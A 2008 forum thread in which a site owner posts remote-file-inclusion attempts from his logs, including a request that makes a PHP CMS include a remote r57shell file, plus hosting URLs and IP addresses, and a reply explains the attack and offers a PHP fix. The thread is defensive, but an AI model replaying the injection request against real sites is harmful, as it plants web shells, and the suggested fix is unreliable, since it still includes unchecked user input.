zeroanarchy Posted July 19, 2008 Share Posted July 19, 2008 Hi I was wondering if someone had a couple of minutes to check out these links and tell me what the code is attempting to do. http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84 http://www.iglesialcs.cl/newweb/images/id2.txt?? | IP: 85.119.244.16 http://www.phanom.ac.th/msnlist/id.txt | IP: 85.214.28.190 http://www.rom.as.ro/id1.txt | IP: 67.205.76.81 http://www.trosken.com/test.txt | IP: 203.146.102.38 http://russianinterpreter.ru/images/stories/idd.txt | IP: 74.200.223.106 http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84 An example of them being run are as follows: mysite//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://geocities.com/rais_corp/tusuk.txt??? luckly I have a very good method of tracking 404 errors so if a hacker hits a 404 I am able to catch him and block the IP address reletively quickly. As you can see I have included the ip addresses of the machines attempting to run these files against my site. All help greatly appreaciated. zeroanarchy Quote Link to comment Share on other sites More sharing options...
Stephen Posted July 19, 2008 Share Posted July 19, 2008 The first one is a r57shell. Second one doesn't look harmful as much. Third one is the same as the second. Fourth is the same as the third. Fifth is checking if you have commands like exec or passthru enabled (I think). Sixth is the same as the fourth. Seventh is the same as the first (r57shell). They're trying to inject a shell into your site so they can have access to it. A shell is "A generic term that refers to the interface that gives the user control over the system.". You should report that site to Yahoo or Geocities and have it taken down. Steps to fix this problem? If you have something like: include($_GET["dir_inc"].".php"); They can inject their own files to your server. Try using something like: if (file_exists($_SERVER["DOCUMENT_ROOT"]."/".$_GET["dir_inc"].".php")) { include($_GET["dir_inc"].".php"); } else { echo("Not found/hacking attempt."); } Quote Link to comment Share on other sites More sharing options...
zeroanarchy Posted July 19, 2008 Author Share Posted July 19, 2008 Thanks Stephen for your prompt reply. I have blocked the ip addresses and will attempt to fix any issues in my code ASAP. Cheers zeroanarchy Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.